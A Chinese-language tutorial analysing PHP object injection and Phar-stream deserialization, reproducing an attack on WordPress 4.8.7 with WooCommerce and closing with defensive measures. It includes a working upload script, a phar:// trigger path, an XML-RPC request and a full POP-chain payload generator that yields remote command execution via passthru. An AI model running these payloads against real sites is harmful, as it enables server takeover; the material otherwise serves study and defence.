PHP反序列化漏洞与Phar流攻击面深度解析<\/h1>

一、PHP反序列化漏洞基础<\/h2>

1.1 漏洞简介<\/h3>
PHP反序列化漏洞（PHP对象注入）是由于程序未对用户输入的序列化字符串进行检测，导致攻击者可以控制反序列化过程，从而引发代码执行、文件操作等安全问题。这类漏洞不仅存在于PHP，在Java、Python等面向对象语言中同样存在。<\/p>

1.2 漏洞原理<\/h3>
漏洞产生的核心在于魔术方法的自动调用机制和危险函数的结合：<\/p>
class<\/span> AnyClass<\/span> {
<\/span><\/span>    public<\/span> $name;
<\/span><\/span>    function<\/span> __destruct() {
<\/span><\/span>        passthru<\/span>($this-><\/span>name<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>当存在以下条件时，漏洞可被利用：<\/p>

包含一个魔术方法（如__destruct<\/code>）<\/li>
魔术方法中直接或间接调用危险函数（如eval<\/code>、call_user_func<\/code>等）<\/li>
能够通过设置成员变量控制危险函数参数<\/li>
<\/ol>
1.3 序列化与反序列化过程<\/h3>
PHP使用serialize()<\/code>和unserialize()<\/code>函数进行对象序列化和反序列化：<\/p>
$obj =<\/span> new<\/span> AnyClass<\/span>();
<\/span><\/span>$obj-><\/span>name<\/span> =<\/span> "test"<\/span>;
<\/span><\/span>$res =<\/span> serialize<\/span>($obj); \/\/ 输出：O:8:"AnyClass":1:{s:4:"name";s:4:"test";}
<\/span><\/span><\/span><\/span>$obj2 =<\/span> unserialize<\/span>($res);
<\/span><\/span><\/code><\/pre>当脚本执行结束，对象销毁时会自动调用__destruct<\/code>方法。<\/p>
1.4 非public属性的处理<\/h3>
对于protected\/private属性，序列化格式会包含特殊字符：<\/p>
class<\/span> ChildClass<\/span> extends<\/span> AnyClass<\/span> {
<\/span><\/span>    protected<\/span> $wc;
<\/span><\/span>    public<\/span> function<\/span> make<\/span>() {
<\/span><\/span>        $this-><\/span>wc<\/span> =<\/span> new<\/span> AnyClass<\/span>();
<\/span><\/span>        $this-><\/span>wc<\/span>-><\/span>name<\/span> =<\/span> 'whoami'<\/span>;
<\/span><\/span>        return<\/span> serialize<\/span>($this-><\/span>wc<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>\/\/ 输出：O:8:"AnyClass":1:{s:7:"*name";s:6:"whoami";}
<\/span><\/span><\/span><\/code><\/pre>二、Phar流转换器攻击面<\/h2>
2.1 PHP流转换器概述<\/h3>
PHP文件操作函数支持多种流转换器：<\/p>

file:\/\/<\/code><\/li>
http:\/\/<\/code><\/li>
ftp:\/\/<\/code><\/li>
php:\/\/<\/code><\/li>
zlib:\/\/<\/code><\/li>
data:\/\/<\/code><\/li>
glob:\/\/<\/code><\/li>
phar:\/\/<\/code><\/li>
<\/ul>
2.2 Phar流特性<\/h3>
Phar是PHP的归档格式，类似于Java的JAR。phar:\/\/<\/code>允许将多个文件归入一个本地文件夹。<\/p>
创建Phar文件示例：<\/p>
@<\/span>unlink<\/span>("phar.phar"<\/span>);
<\/span><\/span>$phar =<\/span> new<\/span> Phar<\/span>("phar.phar"<\/span>);
<\/span><\/span>$phar-><\/span>startBuffering<\/span>();
<\/span><\/span>$phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "test"<\/span>);
<\/span><\/span>$phar-><\/span>setStub<\/span>("<?php __HALT_COMPILER(); ?>"<\/span>);
<\/span><\/span>$phar-><\/span>setMetadata<\/span>($malicious_object);
<\/span><\/span>$phar-><\/span>stopBuffering<\/span>();
<\/span><\/span><\/code><\/pre>关键点：setMetadata()<\/code>会将对象以序列化形式存入Phar文件，当解析时会自动反序列化这些数据。<\/p>
2.3 攻击条件<\/h3>
利用Phar进行攻击需要满足：<\/p>

能够上传包含攻击payload的Phar归档文件（可伪装为JPG等格式）<\/li>
能够将phar:\/\/<\/code>路径传入文件操作函数（如file_exists()<\/code>）<\/li>
<\/ol>
三、WordPress漏洞复现与分析<\/h2>
3.1 环境准备<\/h3>

WordPress 4.8.7<\/li>
WooCommerce插件（最新版）<\/li>
具有作者权限的账号<\/li>
<\/ul>
3.2 攻击步骤<\/h3>

上传恶意Phar文件<\/strong>（伪装为JPG）：<\/li>
<\/ol>
$filename =<\/span> "phar.jpg"<\/span>;
<\/span><\/span>$username =<\/span> 'author'<\/span>;
<\/span><\/span>$password =<\/span> 'xxxx'<\/span>;
<\/span><\/span>$wpsite =<\/span> 'http:\/\/target\/wordpress'<\/span>;
<\/span><\/span>$xmlclient =<\/span> $wpsite.<\/span>'\/xmlrpc.php'<\/span>;
<\/span><\/span>$client =<\/span> new<\/span> IXR_Client<\/span>($xmlclient);
<\/span><\/span>$params =<\/span> array<\/span>(
<\/span><\/span>    'name'<\/span> =><\/span> 'phartest.jpg'<\/span>,
<\/span><\/span>    'type'<\/span> =><\/span> 'image\/pwnage'<\/span>,
<\/span><\/span>    'bits'<\/span> =><\/span> new<\/span> IXR_Base64<\/span>(file_get_contents<\/span>($filename)),
<\/span><\/span>    'overwrite'<\/span> =><\/span> false<\/span>
<\/span><\/span>);
<\/span><\/span>$client-><\/span>query<\/span>('wp.uploadFile'<\/span>, 1<\/span>, $username, $password, $params);
<\/span><\/span><\/code><\/pre>

修改附件元数据<\/strong>：

通过后台修改_wp_attached_file<\/code>为Z:\Z<\/code><\/p>
<\/li>

触发反序列化<\/strong>：

构造请求使file_exists()<\/code>处理phar:\/\/<\/code>路径：<\/p>
<\/li>
<\/ol>
thumb=phar:\/\/.\/wp-content\/uploads\/2018\/08\/phartest-9.jpg\/test.txt
<\/code><\/pre>

通过XML-RPC触发命令执行<\/strong>：<\/li>
<\/ol>
POST \/wordpress\/xmlrpc.php?c=hostname HTTP\/1.1
<\/span><\/span><methodCall><\/span>
<\/span><\/span>  <methodName><\/span>wp.getMediaItem<\/methodName><\/span>
<\/span><\/span>  <params><\/span>
<\/span><\/span>    <param><value><string><\/span>1<\/string><\/value><\/param><\/span>
<\/span><\/span>    <param><value><string><\/span>author<\/string><\/value><\/param><\/span>
<\/span><\/span>    <param><value><string><\/span>xxxx<\/string><\/value><\/param><\/span>
<\/span><\/span>    <param><value><int><\/span>29<\/int><\/value><\/param><\/span>
<\/span><\/span>  <\/params><\/span>
<\/span><\/span><\/methodCall><\/span>
<\/span><\/span><\/code><\/pre>3.3 漏洞原理分析<\/h3>
关键点在wp-includes\/post.php<\/code>中的wp_get_attachment_thumb_file()<\/code>函数：<\/p>
function<\/span> wp_get_attachment_thumb_file<\/span>($post_id =<\/span> 0<\/span>) {
<\/span><\/span>    $file =<\/span> get_attached_file<\/span>($post-><\/span>ID<\/span>);
<\/span><\/span>    if<\/span> (!<\/span>empty<\/span>($imagedata['thumb'<\/span>])) {
<\/span><\/span>        $thumbfile =<\/span> str_replace<\/span>(basename<\/span>($file), $imagedata['thumb'<\/span>], $file);
<\/span><\/span>        if<\/span> (file_exists<\/span>($thumbfile)) {
<\/span><\/span>            return<\/span> $thumbfile;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>通过控制_wp_attached_file<\/code>元数据和thumb<\/code>参数，可以构造出phar:\/\/<\/code>路径触发反序列化。<\/p>
3.4 POP链构造<\/h3>
WordPress 4.9+的POP链利用：<\/p>

核心类<\/strong>：Requests_Utility_FilteredIterator<\/code><\/li>
<\/ol>
class<\/span> Requests_Utility_FilteredIterator<\/span> extends<\/span> ArrayIterator<\/span> {
<\/span><\/span>    protected<\/span> $callback;
<\/span><\/span>    public<\/span> function<\/span> current<\/span>() {
<\/span><\/span>        $value =<\/span> parent<\/span>::<\/span>current<\/span>();
<\/span><\/span>        $value =<\/span> call_user_func<\/span>($this-><\/span>callback<\/span>, $value);
<\/span><\/span>        return<\/span> $value;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
触发点<\/strong>：WooCommerce的WC_Log_Handler_File<\/code>类<\/li>
<\/ol>
class<\/span> WC_Log_Handler_File<\/span> extends<\/span> WC_Log_Handler<\/span> {
<\/span><\/span>    protected<\/span> $handles =<\/span> array<\/span>();
<\/span><\/span>    public<\/span> function<\/span> __destruct() {
<\/span><\/span>        foreach<\/span> ($this-><\/span>handles<\/span> as<\/span> $handle) {
<\/span><\/span>            if<\/span> (is_resource<\/span>($handle)) {
<\/span><\/span>                fclose<\/span>($handle);
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
完整Payload生成<\/strong>：<\/li>
<\/ol>
require<\/span>('wp-load.php'<\/span>);
<\/span><\/span>require_once<\/span>('wp-content\/plugins\/woocommerce\/includes\/log-handlers\/class-wc-log-handler-file.php'<\/span>);
<\/span><\/span>require_once<\/span>('wp-includes\/Requests\/Utility\/FilteredIterator.php'<\/span>);
<\/span><\/span>
<\/span><\/span>$arr =<\/span> array<\/span>("1"<\/span> =><\/span> '@passthru($_GET["c"]);'<\/span>);
<\/span><\/span>$obj_ =<\/span> new<\/span> Requests_Utility_FilteredIterator<\/span>($arr, "assert"<\/span>);
<\/span><\/span>
<\/span><\/span>class<\/span> myClass<\/span> extends<\/span> WC_Log_Handler_File<\/span> {
<\/span><\/span>    protected<\/span> $wc;
<\/span><\/span>    public<\/span> function<\/span> make<\/span>($handle) {
<\/span><\/span>        $this-><\/span>wc<\/span> =<\/span> new<\/span> WC_Log_Handler_File<\/span>();
<\/span><\/span>        $this-><\/span>wc<\/span>-><\/span>handles<\/span> =<\/span> $handle;
<\/span><\/span>        @<\/span>unlink<\/span>("phar.phar"<\/span>);
<\/span><\/span>        $phar =<\/span> new<\/span> Phar<\/span>("phar.phar"<\/span>);
<\/span><\/span>        $phar-><\/span>startBuffering<\/span>();
<\/span><\/span>        $phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "test"<\/span>);
<\/span><\/span>        $phar-><\/span>setStub<\/span>("<?php __HALT_COMPILER(); ?>"<\/span>);
<\/span><\/span>        $phar-><\/span>setMetadata<\/span>($this-><\/span>wc<\/span>);
<\/span><\/span>        $phar-><\/span>stopBuffering<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>四、防御措施<\/h2>


输入验证<\/strong>：<\/p>

严格检查反序列化操作的输入来源<\/li>
使用白名单验证序列化数据<\/li>
<\/ul>
<\/li>

安全配置<\/strong>：<\/p>

禁用不必要的流包装器（如phar:\/\/<\/code>）<\/li>
限制文件上传类型和内容检查<\/li>
<\/ul>
<\/li>

代码层面<\/strong>：<\/p>

避免在魔术方法中使用危险函数<\/li>
对反序列化类进行限制（使用allowed_classes<\/code>选项）<\/li>
<\/ul>
<\/li>

更新维护<\/strong>：<\/p>

及时更新WordPress核心和插件<\/li>
关注PHP官方安全公告<\/li>
<\/ul>
<\/li>
<\/ol>
五、参考资源<\/h2>

BlackHat USA 2018演讲<\/a><\/li>
PHP官方文档：流包装器和Phar扩展<\/li>
WordPress安全公告和补丁说明<\/li>
<\/ol>
PHP反序列化漏洞与Phar流攻击面深度解析<\/h1>

一、PHP反序列化漏洞基础<\/h2>

二、Phar流转换器攻击面<\/h2>

三、WordPress漏洞复现与分析<\/h2>

五、参考资源<\/h2> BlackHat USA 2018演讲<\/a><\/li> PHP官方文档：流包装器和Phar扩展<\/li> WordPress安全公告和补丁说明<\/li> <\/ol>

五、参考资源<\/h2>

BlackHat USA 2018演讲<\/a><\/li>
PHP官方文档：流包装器和Phar扩展<\/li>
WordPress安全公告和补丁说明<\/li> <\/ol>
